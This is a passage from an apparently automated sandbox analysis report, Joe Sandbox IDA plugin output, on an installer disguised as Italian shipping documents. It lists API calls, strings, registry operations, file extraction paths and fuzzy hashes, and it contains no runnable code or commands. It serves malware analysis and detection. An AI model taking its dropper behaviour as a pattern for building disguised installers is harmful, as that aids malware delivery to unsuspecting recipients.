Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

Exec, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll, xrefs: 0040183A, 00401856
C:\Users\user\AppData\Local\acneform, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 00401826, 00401844

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp$C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll$C:\Users\user\AppData\Local\acneform$Exec
API String ID: 1941528284-2668649051
Opcode ID: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll, xrefs: 004055FD, 0040560D, 00405613, 00405636, 00405642

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll
API String ID: 2531174081-1389409888
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
API String ID: 2655323295-1031832637
Opcode ID: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
Opcode Fuzzy Hash: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B
nsa, xrefs: 00406083

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\acneform,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\acneform, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\acneform
API String ID: 1892508949-531015130
Opcode ID: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Exec,?,00000000,00406696,80000002), ref: 0040646B
RegCloseKey.KERNELBASE(?), ref: 00406476

Strings

Exec, xrefs: 0040642C

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CloseQueryValue
String ID: Exec
API String ID: 3356406503-459137531
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

lstrlenW.KERNEL32 ref: 00402344
lstrlenW.KERNEL32(00000000), ref: 0040234F
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
Instruction ID: 885267ae01076befc9d2550e8446c8d72b56611081dd9eb5b5e506e95b58587e
Opcode Fuzzy Hash: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
Instruction Fuzzy Hash: 04117071900318AADB10EFB9D90AA9EB6F8AF14354F20543FA401F72D1DBB88941CB59

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

